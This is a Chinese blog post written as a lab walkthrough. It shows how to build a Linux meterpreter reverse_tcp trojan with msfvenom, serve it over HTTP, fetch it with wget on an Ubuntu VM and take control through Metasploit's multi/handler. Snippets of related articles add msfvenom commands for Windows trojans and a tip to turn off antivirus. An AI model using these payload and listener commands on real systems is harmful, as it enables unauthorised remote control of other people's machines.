记kali下使用metasploit木马进行远程控制

最新推荐文章于 2024-05-06 16:57:21 发布
最新推荐文章于 2024-05-06 16:57:21 发布
阅读量1k 收藏 11
点赞数 3
文章标签: kali linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46371267/article/details/116646004
版权

环境:ubuntun+kali2020.4
本次实验需要两台虚拟机kali及ubuntun
注:kali地址为192.168.147.137 ubuntun的地址为192.168.147.129
本人使用ssh链接
ssh链接ubuntun 并进入root权限
在这里插入图片描述

ssh链接kali
在这里插入图片描述

在kali下root权限下生成payload(也就是木马)
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.147.137 LPORT=4444 -f elf > shell.elf 并成成shell.elf使用ls进行查看
注:192.168.147.137为kali地址4444为端口
在这里插入图片描述

在kali中使用python进行映射

python3 -m http.server 80

在这里插入图片描述

使用ubuntun进行下载 wget http://192.168.147.137/shell.elf
在这里插入图片描述

在kali下msfconsole下使用 use exploit/multi/handler命令(专门用于监听的),并使用options查看参数
在这里插入图片描述

使用set添加参数
在这里插入图片描述

使用set进行payload:linux/x86/meterpreter/reverse_tcp LHOST=192.168.147.137
在这里插入图片描述

在msf中进行run,然后在ubuntun中进行shell.elf 会发现连接成功(如果权限不足使用chmod进行权限的提升)
在这里插入图片描述

下面就可以进行命令的执行 如果权限不够可以使用shell,退出使用exit

在这里插入图片描述

Fa1hai1
关注
  • 3
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
简单远程控制 Metasploit应用
m0_62659165的博客
11-22 280
简单远程控制 Metasploit应用
Kali远程控制Windows系统(Metasploit)
热门推荐
董哥的黑板报
06-24 2万+
一、在Kali Linux中生成被控端(msfvenom命令) 第一步:下面我们用msfvenom命令使用反向远程控制程序“windows/meterpreter/reverse_tcp”。该软件执行时自动连接IP“192.168.43.77”,连接的端口为“5000”,生成的文件为payload.exe,在/root目录下 msfvenom -p windows/meterpreter/re...
网络安全技术新手入门 利用Kali Linux生成简单的远程控制木马_kali生成远程
2401_84263434的博客
05-02 1047
输入命令:msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.10.147 lport=9999 -f exe -o MyDemo.exe参数含义:-p:payload -f:format -o:output运行结果如下:查看病毒:1.关闭杀毒程序杀毒程序包括一些杀毒软件以及电脑本身的防毒程序因为杀毒软件五花八门所以读者门自行研究关闭,这里只演示电脑本身的杀毒程序的关闭tips:新手阶段一般都用windows
kali利用ftp端口(21)漏洞攻击Metasploitable2-Linux靶机(笑脸漏洞)
qq_58018041的博客
04-22 3605
#vsftpd源码包含后门漏洞#思路:开放21端口,并且vsftpd版本号为2.3.4#原理:在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“:)”结尾时,服务器就会在6200端口监听,并且能够执行任意代码。攻击机:kali :192.168.111.128靶机:Metasploitable2-Linux:192.168.111.132Metasploitable 的用户名和密码均为:msfadmin。
metasploitable2与Ubuntu Server 14.04.1 LTS渗透
qq_74378387的博客
11-02 135
kalimetasploitable2:10.10.10.139 下载链接:https://pan.baidu.com/s/14iPfB0EnG-orRIPvvN4vxg?pwd=babtUbuntu Server:10.10.10.135 下载链接:https://pan.baidu.com/s/13w8O8A8c79ubCN2BC3RrBQ?pwd=gatw让kali与两个靶机用同一张网卡。
使用msfvenom实现远程控制.
2301_78457119的博客
06-24 694
Kali 2中生成被控端的工具:msfvenom(msfvenom是渗透测试工具Metasploit中的一个命令)1、查看帮助信息、查2.看所有可以使用的攻击模块3、筛选出使用reverse_tcp的模块。
kali-linux 工具Metasploit离线式攻击使用教程
12-29
在IT安全领域,Kali Linux是一款著名的开源渗透测试操作系统,其中包含了各种安全工具,而Metasploit则是其中的重要组件之一,主要用于进行安全漏洞利用和红队演练。本教程将聚焦于Metasploit的离线攻击使用方法,这...
Kali系列之root账户ssh远程登录配置.docx
12-06
添加后,别忘了重启SSH服务`service ssh restart`,这样新版本的Kali Linux就支持了老版本的密钥交换算法,应该可以顺利地通过CRT等客户端工具进行远程登录了。 总的来说,配置Kali Linux的root账户SSH远程登录涉及...
Kali Linux系统使用基础教程.pdf
11-29
Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统。由Offensive Security Ltd维护和资助。最先由Offensive Security的Mati Aharoni和Devon Kearns通过重写BackTrack来完成,BackTrack是他们之前写的...
使用kali-linuxMetasploit Framework接入互联网的使用教程
12-29
使用kali-linuxMetasploit Framework接入互联网的使用教程
kali工具使用.pdf
09-14
kali工具使用.pdf
KaLi Linux使用Metasploit
sheaadens的博客
06-21 434
因此,使用Metasploit来爆破Tomcat密码,以找到计算机系统中存在的可能的漏洞和安全风险,将是非常有用的。其中,指定了目标IP地址,以及Tomcat服务器默认的8080端口,同时设置了强制暴力破解的速度。你可以打开Metasploit中的控制台,并使用漏洞扫描程序,例如Nmap,扫描目标计算机系统的IP地址,并以此查找Tomcat服务器存在的漏洞。如果你已经找到了Tomcat服务器中的漏洞,你可以使用Metasploit的攻击模块来创建一个加密的Payload,以便能够访问Tomcat服务器。
kali3、nessus 针对 Metasploitable2-Linux 渗透测试-openssl
hzwindpower的博客
01-13 878
1、kali、nessus、Metasploitable2-Linux环境已经安装完毕。 2、利用nessus对靶机进行扫描,得出许多安全漏洞 3、从下到下依次开始进行测试如图: 4、点开链接,得出该漏洞CVE ID为 CVE-2008-0166 http://www.nessus.org/u?107f9bdc http://www.nessus.org/u?f14f4224 包:openssl 漏洞:可预测的随机数生成器 问题类型:远程 Debian专用:是 CVE ID:CVE-2008-0166 L
Metasploit 内网渗透三 —— Metasploit 渗透测试之信息搜集2 ——基于SNMP协议收集主机信息
最新发布
天下著书立传者,皆为我师
05-06 551
渗透测试 — Metasploit 内网渗透三 —— Metasploit 渗透测试之信息搜集2 ——基于SNMP协议收集主机信息
kali metasploit 制作后门程序远程操控基本使用方法
qq_51685718的博客
12-03 4040
kali metasploit制作后门程序远程操控基本使用方法 1.后门程序的制作与加密 后门的实质就是木马 msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.34.53 lport=10000 -f exe -o biyu.exe lhost后面加的是本机ip,lport后面加的是想要打开的端口号 执行后会在本地生成一个biyu.exe的文件 如果直接上传到win系统会被杀毒软件杀掉,我们可以用自己的电脑对其进行一个加壳操作。 下
Kali生成windows木马程序
qq_51950323的博客
09-07 9710
此文章为kali生成windows木马程序,进行的后渗透测试。此操作仅供虚拟机测试,请勿使用于非法途径。
Kali Linux 网络安全渗透测试
06-02
为什么学网络安全?1. 市场巨大每年各安全厂商收入高达400亿左右,随着5G的发展,万物互联时代,市场将进一步扩大。2. 薪资高网安人才的匮乏,用人开出招聘薪资往往高于求职者的预期。3. 靠能力说话在网络安全专业,专业技能竞争力要远高于学历本身。在网安专业只看能力不看学历也成了大家公认的原则。 网络安全未来10年的发展前景现代人的生活与网络息息相关,个人、企业信息的安全显示尤为重要,2018年报告的信息安全事件比2017年有所增加,一年几千万次。应对网络安全挑战,已越来越被重视。不管你是否从事网络安全行业相关工作,信息安全都显得越来越重要。 注意:视频教学内容仅用于网络安全渗透测试。其他行为,自己承担相应的责任,与作者无关。 
Metasploit渗透测试手册》—第3章3.4节绑定远程访问目标机器的shell
weixin_33904756的博客
05-02 107
本节书摘来自异步社区《Metasploit渗透测试手册》一书中的第3章3.4节绑定远程访问目标机器的shell,作者【印度】Abhinav Singh,更多章节内容可以访问云栖社区“异步社区”公众号查看。 3.4 绑定远程访问目标机器的shellMetasploit渗透测试手册在前面内容中,分析了怎样对Windows SP2进行攻击渗透,并在其上添加新的...
【网络安全】Metasploit生成的Shellcode的导入函数解析以及执行流程分析(2)
HBohan的博客
09-14 425
密码破解的利器——彩虹表(rainbow table) 确定 shellcode 依赖于哪些导入将使研究人员进一步了解其其余逻辑。不用动态分析shellcode,并且考虑到研究人员已经弄清楚了上面的哈希算法,研究人员可以自己构建一个彩虹表。 彩虹表是一个预先计算好的表,用于缓存加密哈希函数的输出,通常用于破解密码哈希。 以下 Python 代码段计算位于最常见系统位置的 DLL 导出的“Metasploit”哈希值。 例如,下面的PowerShell命令生成一个彩虹表,然后搜索下图中首先观察到的72677
kali metasploit 木马
08-30
对于Kali LinuxMetasploit使用,我可以提供一些...在未经授权的情况下使用Metasploit来攻击他人的计算机是违法行为,这是非常严重的。 所以,请确保你只在合法的环境中使用这些工具,并遵守适用的法律和道德准则。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值